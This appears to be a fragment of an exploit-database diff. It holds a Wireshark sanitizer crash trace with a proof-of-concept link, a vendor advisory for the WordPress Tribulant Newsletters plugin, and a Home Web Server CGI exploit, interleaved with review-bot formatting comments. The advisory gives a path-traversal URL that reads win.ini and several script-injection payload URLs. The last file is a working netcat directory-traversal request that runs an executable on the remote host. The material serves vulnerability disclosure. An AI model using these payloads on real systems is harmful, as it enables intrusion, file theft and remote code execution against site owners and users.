Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
|
||||
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
|
||||
#50 0x564f18165709 in _start (run/tshark+0xd1709)
|
||||
|
||||
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip
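Review bot: the SUMMARY line is truncated, ending in "in" without the function name that the sanitizer normally appends (frame #0 gives it as wmem_str_hash at epan/wmem/wmem_map.c:419:50), so the report should be regenerated or the line completed before this record is merged. The trace itself already states the defect precisely (a NULL string reaching a nonnull argument via ros_try_string, ./asn1/ros/packet-ros-template.c:148, on the IDMP-over-TCP path), so a one-line statement of the failure mode (sanitizer abort on a crafted capture) and the remediation (an updated Wireshark build) would serve readers better than leaving them to fetch the PoC zip to learn what it does.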
143
platforms/php/webapps/42129.txt
Executable file
@ -0,0 +1,143 @@
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
Multiple Security Vulnerabilities


Advisory ID: DC-2017-01-012
Advisory Title: WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Tribulant Newsletters Plugin
Language: PHP
Version: 4.6.4.2 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/29
Risk: Medium



1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.

More information about WebScanner is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.

According to wordpress.org, it has more than 9,000 active installs.

Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin


3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.

3.1 File Disclosure
----
Input: $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini

3.2 Cross-Site Scripting
----
Input: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.3 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start

3.4 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.5 Cross-Site Scripting
----
Input: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>

3.6 Cross-Site Scripting
----
Input: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

3.7 Cross-Site Scripting
----
Input: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

3.8 Cross-Site Scripting
----
Input: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded, update released
2017/05/29 Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
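Review bot: the Vendor Status line, section 4 (Solution) and the 2017/04/06 timeline entry all say an update was released but none of them names the fixed version, so an administrator running "4.6.4.2 and below" cannot tell from this advisory which release closes the file disclosure and the eight XSS issues; add the fixed version to the header and to the timeline entry. Two smaller points in the same file: the "=" underline beneath "3. Vulnerability Description" is longer than the heading while every other section underline matches its title, and "Cross Site Scripting" in the section 3 text should be hyphenated to agree with the "Cross-Site Scripting" subsection titles.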
46
platforms/windows/remote/42128.txt
Executable file
@ -0,0 +1,46 @@
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps

"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him


Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.


Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""

# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)

"""
[CTRL+C] : this is important to launch the executable we requested

Calc.exe has been launched on the remote host.
"""